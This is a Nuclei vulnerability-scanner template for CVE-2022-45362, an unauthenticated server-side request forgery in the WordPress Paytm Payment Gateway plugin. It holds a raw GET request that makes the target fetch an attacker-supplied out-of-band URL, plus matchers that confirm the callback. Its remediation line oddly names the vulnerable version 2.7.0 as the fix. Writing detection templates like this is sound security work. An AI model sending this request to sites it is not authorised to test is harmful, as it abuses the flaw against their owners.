46 lines
1.7 KiB
YAML
46 lines
1.7 KiB
YAML
id: CVE-2022-45362
|
|
|
|
info:
|
|
name: WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery
|
|
author: theamanrawat
|
|
severity: high
|
|
description: WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
remediation: |
|
|
Update to the latest version of the WordPress Paytm Payment Gateway plugin (2.7.0) or apply the vendor-supplied patch.
|
|
reference:
|
|
- https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability
|
|
- https://wordpress.org/plugins/paytm-payments/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-45362
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-45362
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "paytm-payments.css"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100d5cc2842abbf055af4f9f96b3c675edb466a95ab8b06eab0d86091cc4bb229e9022100acb5a871a8ffd9a218869b20fdab4c654c708254fd3ef5047bca5368887b01a7:922c64590222798bb761d5b6d8e72950
|